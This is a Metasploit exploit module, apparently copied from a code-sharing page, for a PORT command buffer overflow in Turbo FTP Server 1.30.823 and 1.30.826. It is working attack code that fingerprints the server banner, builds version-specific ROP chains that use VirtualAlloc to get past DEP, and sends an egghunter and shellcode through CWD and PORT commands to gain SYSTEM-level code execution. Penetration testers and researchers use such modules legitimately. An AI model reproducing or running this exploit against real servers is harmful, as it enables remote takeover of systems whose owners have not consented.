扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Turbo FTP Server 1.30.823 PORT Overflow', 'Description'=> %q{ This module exploits a buffer overflow vulnerability found in the PORT command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote code execution under the context of SYSTEM. }, 'Author' => [ 'Zhao Liang',#Initial Descovery 'Lincoln', #Metasploit 'corelanc0d3r',#Metasploit 'thelightcosine' #Metasploit ], 'License'=> MSF_LICENSE, 'Platform' => [ 'win' ], 'References' => [ [ 'OSVDB', '85887' ] ], 'Payload'=> { 'BadChars' => "\x00", 'EncoderType'=> Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EDI' } }, 'Targets'=> [ [ 'Automatic', {} ], ['Windows Universal TurboFtp 1.30.823', { 'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe] 'ver' => 823 }, ], [ 'Windows Universal TurboFtp 1.30.826', { 'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe] 'ver' => 826 }, ], ], 'DisclosureDate' => 'Oct 03 2012', 'DefaultTarget'=> 0)) end def check connect disconnect if (banner =~ /1\.30\.823/) return Exploit::CheckCode::Vulnerable elsif (banner =~ /1\.30\.826/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def create_rop_chain(ver) # rop chain generated with mona.py - www.corelan.be if ver == 823 rop_gadgets = [ 0x004b692a, # POP ECX # RETN [tbssvc.exe] 0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe] 0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe] 0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe] 0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe] 0x005d1c99, # POP EBP # RETN [tbssvc.exe] 0x004cad5d, # & jmp esp [tbssvc.exe] 0x004ab16b, # POP EBX # RETN [tbssvc.exe] 0x00000001, # 0x00000001-> ebx 0x005ef7f6, # POP EDX # RETN [tbssvc.exe] 0x00001000, # 0x00001000-> edx 0x005d7139, # POP ECX # RETN [tbssvc.exe] 0x00000040, # 0x00000040-> ecx 0x004df1e0, # POP EDI # RETN [tbssvc.exe] 0x00411985, # RETN (ROP NOP) [tbssvc.exe] 0x00502639, # POP EAX # RETN [tbssvc.exe] 0x90909090, # nop 0x00468198, # PUSHAD # RETN [tbssvc.exe] ].flatten.pack("V*") elsif ver == 826 rop_gadgets = [ 0x0050eae4, # POP ECX # RETN [tbssvc.exe] 0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe] 0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe] 0x00496A65, # XOR EAX,EAX [tbssvc.exe] 0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe] 0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe] 0x00000001, # 0x00000001-> ebx 0x0058a27a, # POP EBP # RETN [tbssvc.exe] 0x004df7dd, # & call esp [tbssvc.exe] 0x005f07f6, # POP EDX # RETN [tbssvc.exe] 0x00001000, # 0x00001000-> edx 0x004adc08, # POP ECX # RETN [tbssvc.exe] 0x00000040, # 0x00000040-> ecx 0x00465fbe, # POP EDI # RETN [tbssvc.exe] 0x004fb207, # RETN (ROP NOP) [tbssvc.exe] 0x00465f36, # POP EAX # RETN [tbssvc.exe] 0x90909090, # nop 0x004687ff, # PUSHAD # RETN [tbssvc.exe] ].flatten.pack("V*") end return rop_gadgets end def exploit my_target = target if my_target.name == 'Automatic' print_status("Automatically detecting the target") connect disconnect if (banner =~ /1\.30\.823/) my_target = targets[1] elsif (banner =~ /1\.30\.826/) my_target = targets[2] end if (not my_target) print_status("No matching target...quiting") return end target = my_target end print_status("Selected Target: #{my_target.name}") connect_login rop_chain = create_rop_chain(target['ver']) rop = rop_chain.unpack('C*').join(',') eggoptions = { :checksum => true, :eggtag => 'w00t', :depmethod => 'virtualalloc', :depreg => 'esi' } badchars = "\x00" hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions) speedupasm = "mov edx,eax\n" speedupasm << "sub edx,0x1000\n" speedupasm << "sub esp,0x1000" speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string fasterhunter = speedup fasterhunter << hunter print_status("Connecting to target #{target.name} server") buf1 = rand_text_alpha(2012) buf1 << egg buf1 << rand_text_alpha(100) buf2 = rand_text_alpha(4).unpack('C*').join(',') buf2 << "," buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eip buf2 << "," buf2 << rop buf2 << "," buf2 << fasterhunter.unpack('C*').join(',') buf2 << "," buf2 << rand_text_alpha(90).unpack('C*').join(',') send_cmd( ['CWD', buf1], true ); send_cmd( ['PORT', buf2], true ); print_status("Egghunter deployed, locating shellcode") handler disconnect end end |
体验盒子
